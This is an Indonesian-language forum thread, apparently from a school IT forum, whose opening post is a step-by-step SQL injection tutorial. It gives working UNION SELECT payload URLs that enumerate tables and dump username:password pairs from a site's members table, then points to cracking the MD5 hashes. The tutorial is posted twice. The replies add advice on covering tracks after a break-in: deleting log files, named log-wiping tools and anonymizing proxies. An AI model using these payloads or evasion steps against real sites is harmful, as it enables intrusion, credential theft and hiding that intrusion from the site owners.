Search
Latest topics
Top posters
agoenk (2099) | ||||
viyan_cs (1036) | ||||
b-joe (749) | ||||
ieyaz_Chuit (725) | ||||
Zell Aristocrats (667) | ||||
jun43d1 (638) | ||||
Hetro_fabio (314) | ||||
twinkblack (265) | ||||
suzee_tkj2 (237) | ||||
harmoko (184) |
sql injection(mencari pasword & username suatu web dan data penting lainnya)
+6
gantex
harmoko
suzee_tkj2
twinkblack
jun43d1
viyan_cs
10 posters
Page 1 of 2
Page 1 of 2 • 1, 2
sql injection(mencari pasword & username suatu web dan data penting lainnya)
di postingan kali ini akan saya terangkan step by step bagaimana hacker menyusup ke dalam sistem dan mengexploitasi hole dengan sql injection
http://(target).com/path/newsdetail.php?id=15(untuk alamat bisa anda cari sendiri tergantung kreatifitas)
langkahnya:
1. cek dulu apakah website tuh error sqlnya?
http://(target).com/path/newsdetail.php?id=15' (tanda (') adalah untuk mengetahui apakah web target error sqlnya or tidak)
jika muncul kalimat You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY `date` DESC' at line 1 berarti web target sqlnya error or kalimat yang lainnya yang menunjukan sqlnya tuh error.
2.kita cari column dengan perintah order by..
order by kita gunakan untuk mengurutkan column, jadi jika perintahnya order by 5, maka column yang pertama muncul diurutkan dari column ke-5..atau dalam kata lain kita mencari batasan dari kolom table(menebak2 angka)
misalnya pada target kita ini saia pake http://(target).com/path/newsdetail.php?id=15%20order%20by%207--
ternyata muncul pesan Unknown column '7' in 'order clause'
lalu coba lagi http://(target).com/path/newsdetail.php?id=15%20order%20by%206--
muncul pesan yang sama juga
anda coba lagi dengan http://(target).com/path/newsdetail.php?id=15%20order%20by%205--
website dalam keadaan normal kembali..
intinya disini target menggunakan 5 colomn.
3. sekarang kita lakukan perintah union select diakhiri urutan column dari pertama sampai terakhir, gunanya untuk melihat di angka mana kita bisa lakukan injeksi..
jangan lupa tambahkan tanda "-" diawal angka parameter id, contohnya http://(target).com/path/newsdetail.php?id=-15
dalam prakteknya kita ketikan http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,2,3,4,5--
akan muncul "angka ajaibnya"misal 2 dan 3, disitulah hole yang memulai para hacker untuk melakukan injeksi
selanjutnya melihat versi database,sebelum mencari versi database kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya..
4.@@version adalah command untuk melihat versi database.. bisa juga dengan menggunakan perintah version()..
dalam prakteknya http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,@@version,3,4,5--
maka di web target muncul 5.0.27-standard-log menandai bahwa web target menggunakan database versi 5.
5.selanjutnya mencari table dari information_schema dengan memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()--
dalam prakteknya
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,
group_concat(table_name),3,4,5%20from%20information_schema.tables
%20where%20table_schema=database()--
jika berhasil maka akan mucul table misal...artists,members,news,newscomments,videocomments,videos
6.sekarang kita akan mengintip informasi di dalam table members, pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table'
dalam prakteknya
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,
group_concat(column_name),3,4,5%20from%20
information_schema.columns
%20where%20table_name=%27members%27--
error!
table 'members' harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..
untuk menconvertnya kita tinggal ketikan text to hex convert di google
setelah di convert kata members ke hexa menjadi 6d656d62657273
7. setelah mengkonvert lakukan perintah ini nih..
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,
group_concat(column_name),3,4,5%20from%20
information_schema.columns%20where%20table_name=0x6d656d62657273%20%20--
jika berhasil akan muncul username and paswordnya dari table members...
misal id,username,password,f_name,l_name,email,dob,sex,address,city,country,aboutme,profilepicture,active_usr,random_usr
8. perintahnya: group_concat(username,0x3a,password) tambahkan diakhir URL from members
dimana 0x3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from members adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama members..
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,group_concat
(username,0x3a,password),3,4,5%20from%20members--
viola data has been hacked
sekarang kita akan login sebagai members, namun user members telah terenkripsi dengan MD5
maka anda harus mengkonvertnya ke text bisa anda cari di google "How to Descrypt MD5"
note:%20 = spasi
last edited 10 nov by viyancs
referensi : http://viyancs.wordpress.com/2010/11/10/sql-injectionmencari-pasword-username-suatu-web-dan-data-penting-lainnya/
http://(target).com/path/newsdetail.php?id=15(untuk alamat bisa anda cari sendiri tergantung kreatifitas)
langkahnya:
1. cek dulu apakah website tuh error sqlnya?
http://(target).com/path/newsdetail.php?id=15' (tanda (') adalah untuk mengetahui apakah web target error sqlnya or tidak)
jika muncul kalimat You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY `date` DESC' at line 1 berarti web target sqlnya error or kalimat yang lainnya yang menunjukan sqlnya tuh error.
2.kita cari column dengan perintah order by..
order by kita gunakan untuk mengurutkan column, jadi jika perintahnya order by 5, maka column yang pertama muncul diurutkan dari column ke-5..atau dalam kata lain kita mencari batasan dari kolom table(menebak2 angka)
misalnya pada target kita ini saia pake http://(target).com/path/newsdetail.php?id=15%20order%20by%207--
ternyata muncul pesan Unknown column '7' in 'order clause'
lalu coba lagi http://(target).com/path/newsdetail.php?id=15%20order%20by%206--
muncul pesan yang sama juga
anda coba lagi dengan http://(target).com/path/newsdetail.php?id=15%20order%20by%205--
website dalam keadaan normal kembali..
intinya disini target menggunakan 5 colomn.
3. sekarang kita lakukan perintah union select diakhiri urutan column dari pertama sampai terakhir, gunanya untuk melihat di angka mana kita bisa lakukan injeksi..
jangan lupa tambahkan tanda "-" diawal angka parameter id, contohnya http://(target).com/path/newsdetail.php?id=-15
dalam prakteknya kita ketikan http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,2,3,4,5--
akan muncul "angka ajaibnya"misal 2 dan 3, disitulah hole yang memulai para hacker untuk melakukan injeksi
selanjutnya melihat versi database,sebelum mencari versi database kita akan mencari informasi table dan column dari information_schema, dimana information_schema tidak terdapat di database versi 4, jadi kalau targetnya mempunyai database MySQL versi 4, yang kita lakukan yaitu menebak-nebak tablenya..
4.@@version adalah command untuk melihat versi database.. bisa juga dengan menggunakan perintah version()..
dalam prakteknya http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,@@version,3,4,5--
maka di web target muncul 5.0.27-standard-log menandai bahwa web target menggunakan database versi 5.
5.selanjutnya mencari table dari information_schema dengan memasukkan perintah group_concat(table_name) didalam "angka ajaib" kemudian diakhir URL tambahkan from information_schema.tables where table_schema=database()--
dalam prakteknya
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,
group_concat(table_name),3,4,5%20from%20information_schema.tables
%20where%20table_schema=database()--
jika berhasil maka akan mucul table misal...artists,members,news,newscomments,videocomments,videos
6.sekarang kita akan mengintip informasi di dalam table members, pertama cek column dulu di table admin dengan perintah group_concat(column_name) dan diakhir URL tambahkan from information_schema.columns where table_name='nama table'
dalam prakteknya
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,
group_concat(column_name),3,4,5%20from%20
information_schema.columns
%20where%20table_name=%27members%27--
error!
table 'members' harus diconvert dulu ke hexa agar dapat dibaca oleh SQL..
dengan catatan, kita harus menambahkan 0x didepan hexa agar server dapat mengetahui bahwa itu telah diconvert ke hexa..
untuk menconvertnya kita tinggal ketikan text to hex convert di google
setelah di convert kata members ke hexa menjadi 6d656d62657273
7. setelah mengkonvert lakukan perintah ini nih..
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,
group_concat(column_name),3,4,5%20from%20
information_schema.columns%20where%20table_name=0x6d656d62657273%20%20--
jika berhasil akan muncul username and paswordnya dari table members...
misal id,username,password,f_name,l_name,email,dob,sex,address,city,country,aboutme,profilepicture,active_usr,random_usr
8. perintahnya: group_concat(username,0x3a,password) tambahkan diakhir URL from members
dimana 0x3a adalah tanda : yang telah diconvert ke hexa, agar format tampilannya username:password, dan command from members adalah untuk menjalankan perintah untuk mengambil informasi dari table yang bernama members..
http://(target).com/path/newsdetail.php?id=-15%20union%20select%201,group_concat
(username,0x3a,password),3,4,5%20from%20members--
viola data has been hacked
sekarang kita akan login sebagai members, namun user members telah terenkripsi dengan MD5
maka anda harus mengkonvertnya ke text bisa anda cari di google "How to Descrypt MD5"
note:%20 = spasi
last edited 10 nov by viyancs
referensi : http://viyancs.wordpress.com/2010/11/10/sql-injectionmencari-pasword-username-suatu-web-dan-data-penting-lainnya/
Last edited by viyan_cs on Wed Nov 10, 2010 2:11 pm; edited 2 times in total
viyan_cs- tkj geek
- Posts : 1036
Join date : 2009-03-19
Age : 32
Location : bogkids
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
wew ...........ngeri ah
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
hi.................atut................
dah coba belum sop.....
ane ajarin yang kaya gituan donk.....
dah coba belum sop.....
ane ajarin yang kaya gituan donk.....
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
twinkblack wrote:hi.................atut................
dah coba belum sop.....
ane ajarin yang kaya gituan donk.....
hhmm ane dapat tutorialnya trus ane penasaran gituu..ternyata setelah ane praktekin ..ya uth hasilnya...
viyan_cs- tkj geek
- Posts : 1036
Join date : 2009-03-19
Age : 32
Location : bogkids
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
ada yang mo nyoba...?
viyan_cs- tkj geek
- Posts : 1036
Join date : 2009-03-19
Age : 32
Location : bogkids
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
boleh jg sih........
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
wah sql injection mah uda biasa........
suzee_tkj2- tkjmaniac
- Posts : 237
Join date : 2009-04-10
Age : 31
Location : LBS city
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
wew hebat ah zuzi katna dah biasa......
bro tu kan cara masukna, lah sekarang yang jadi masalah adalah kalo kita dah berhasil masuk dan ingin menghilangkan jejek biar ga ketahuan sama pemilik gimana carana
kalo katahuankan berbahaiiiiiiiiiiiiiiiiiiiiiiya...
misal ni OS&versi SQL dia 5.0.32-Debian_7etch8-log
bro tu kan cara masukna, lah sekarang yang jadi masalah adalah kalo kita dah berhasil masuk dan ingin menghilangkan jejek biar ga ketahuan sama pemilik gimana carana
kalo katahuankan berbahaiiiiiiiiiiiiiiiiiiiiiiya...
misal ni OS&versi SQL dia 5.0.32-Debian_7etch8-log
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
tinggal hapus aja log file nya. atau jg bisa gunain utility semacam : su.pl, guru-antilog.sh, ssheater-1.1.tar.gz
suzee_tkj2- tkjmaniac
- Posts : 237
Join date : 2009-04-10
Age : 31
Location : LBS city
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
wewewewe.........
mba suzee pinter cuy....
mba suzee pinter cuy....
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
wew kyne dah sering nyoba yah zuz....
kasih penjelasan yang detail atuh....biar yang lainnya tau....
sekalian yar q ga usah muter2 browser.
kasih penjelasan yang detail atuh....biar yang lainnya tau....
sekalian yar q ga usah muter2 browser.
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
[quote="suzee_tkj2"]tinggal hapus aja log file nya. atau jg bisa gunain utility semacam : su.pl, guru-antilog.sh, ssheater-1.1.tar.gz[/quote]
tu masih bisa kedeteksi jika komputr serverselaku container menggunakan perintah netstat dan akan muncul ip yang terhubung ke komputer server...nah dari situ si admin yang dirugikan akan mencoba mencari letak ip computer tersebut dimana milik siapa dan dari isp mana...dengan cara menghubungi IANA(internet Assigned Numbers Authority) Iana bertanggung jawab terhadap keseluruhan manajement dan koordinasi dns serta delegasi nama domain didunia.
tu masih bisa kedeteksi jika komputr serverselaku container menggunakan perintah netstat dan akan muncul ip yang terhubung ke komputer server...nah dari situ si admin yang dirugikan akan mencoba mencari letak ip computer tersebut dimana milik siapa dan dari isp mana...dengan cara menghubungi IANA(internet Assigned Numbers Authority) Iana bertanggung jawab terhadap keseluruhan manajement dan koordinasi dns serta delegasi nama domain didunia.
viyan_cs- tkj geek
- Posts : 1036
Join date : 2009-03-19
Age : 32
Location : bogkids
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
[quote="twinkblack"]wew hebat ah zuzi katna dah biasa......
bro tu kan cara masukna, lah sekarang yang jadi masalah adalah kalo kita dah berhasil masuk dan ingin menghilangkan jejek biar ga ketahuan sama pemilik gimana carana
kalo katahuankan berbahaiiiiiiiiiiiiiiiiiiiiiiya...
misal ni OS&versi SQL dia 5.0.32-Debian_7etch8-log[/quote]
gunain aja proxy www.anonymouse.ws dimana jika kita browsing menggunakan anonymouse yang akan tercatat di ip server adalah alamat ip anonymouse bukan alamat ip kita alias tidak mencatat gerak-gerik or tingkah laku kita dalam berinternetan ..
dan ada lagi nih www.securitywire.com
www.proxify.com
bro tu kan cara masukna, lah sekarang yang jadi masalah adalah kalo kita dah berhasil masuk dan ingin menghilangkan jejek biar ga ketahuan sama pemilik gimana carana
kalo katahuankan berbahaiiiiiiiiiiiiiiiiiiiiiiya...
misal ni OS&versi SQL dia 5.0.32-Debian_7etch8-log[/quote]
gunain aja proxy www.anonymouse.ws dimana jika kita browsing menggunakan anonymouse yang akan tercatat di ip server adalah alamat ip anonymouse bukan alamat ip kita alias tidak mencatat gerak-gerik or tingkah laku kita dalam berinternetan ..
dan ada lagi nih www.securitywire.com
www.proxify.com
viyan_cs- tkj geek
- Posts : 1036
Join date : 2009-03-19
Age : 32
Location : bogkids
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
Hehhehehehe....
Pada heran ya???
Pada heran ya???
suzee_tkj2- tkjmaniac
- Posts : 237
Join date : 2009-04-10
Age : 31
Location : LBS city
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
menggunakan proxy jg belum bisa menjamin keamanan kita apalagi dari web penyedia proxy yg gratis.
hehhehehehe.......
hehhehehehe.......
suzee_tkj2- tkjmaniac
- Posts : 237
Join date : 2009-04-10
Age : 31
Location : LBS city
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
klo pengen aman jangan melakukan injection :D:D
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
[quote="ghantex17"]klo pengen aman jangan melakukan injection :D:D[/quote]
wah jawaban tepat tuh ka juneed....
wah jawaban tepat tuh ka juneed....
viyan_cs- tkj geek
- Posts : 1036
Join date : 2009-03-19
Age : 32
Location : bogkids
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
ga heran ko' biasa aja kalisuzee_tkj2 wrote:Hehhehehehe....
Pada heran ya???
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
sus klo dah biasa injeksi web ajarin donk
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
sus ajarin SQl dong......
kayane wiz mahir nemen sih sus..
bagi2 ilmune oh............
kayane wiz mahir nemen sih sus..
bagi2 ilmune oh............
gantex- newbie tkj
- Posts : 73
Join date : 2009-03-12
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
wah ternyata mba susi mahir yaaa ???
ya bole laaah di share ilmuna....heuheuee
ya bole laaah di share ilmuna....heuheuee
agoenk- tkjholic
- Posts : 2099
Join date : 2009-03-11
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
btw suseee...kemana yaa....????
viyan_cs- tkj geek
- Posts : 1036
Join date : 2009-03-19
Age : 32
Location : bogkids
Re: sql injection(mencari pasword & username suatu web dan data penting lainnya)
Mr. Viyan ada ga sih tutorial pdf sql n php injection yg lbh mudah dipahami n dipljrin???
kirim link na ych??
cz br kali2 bljr nginjek ga prnah brhasil...
kirim link na ych??
cz br kali2 bljr nginjek ga prnah brhasil...
johan_ady24- tkjmaniac
- Posts : 114
Join date : 2009-03-25
Age : 31
Location : Lebaksiu - Slawie
Page 1 of 2 • 1, 2
Similar topics
» Mengamankan Data Penting Pada Flashdisk
» Sembunyikan folder (data) penting dengan Hide Folders
» Teknik Blokir Semua File Executable Dan Script Di Suatu Drive
» Teknik Blokir Semua File Executable dan Scrip dari suatu drive
» cara agar data dari harddisk gak bisa dicopy
» Sembunyikan folder (data) penting dengan Hide Folders
» Teknik Blokir Semua File Executable Dan Script Di Suatu Drive
» Teknik Blokir Semua File Executable dan Scrip dari suatu drive
» cara agar data dari harddisk gak bisa dicopy
Page 1 of 2
Permissions in this forum:
You cannot reply to topics in this forum
|
|
Tue Feb 14, 2017 11:22 am by agoenk
» Verifikasi UPK 2017
Tue Feb 14, 2017 11:01 am by agoenk
» Simulasi UBK tahap kedua
Tue Feb 14, 2017 10:44 am by agoenk
» Mengganti favicon di wordpress
Sat Feb 11, 2017 11:22 am by agoenk
» Undangan Pertemuan Rutin MGMP TKJ Gugus Bisman SMKN 1 Slawi bulan Desember 2016 sekaligus Pelatihan Mikrotik
Sat Nov 26, 2016 9:59 am by agoenk
» SPMI ( Sistem Penjaminan Mutu Internal ) untuk sekolah Model
Wed Oct 26, 2016 1:58 pm by agoenk
» Pertemuan Rutin MGMP TKJ Gugus Bisman SMK Negeri 1 Slawi Bulan Oktober 2016
Fri Oct 14, 2016 10:17 pm by agoenk
» INFO PPDB SMKN 1 SLAWI TAHUN PELAJARAN 2016 / 2017
Mon Jun 13, 2016 6:35 am by Admin
» Kegiatan 3P Jurusan TKJ SMKN 1 Slawi
Tue Apr 26, 2016 10:16 am by agoenk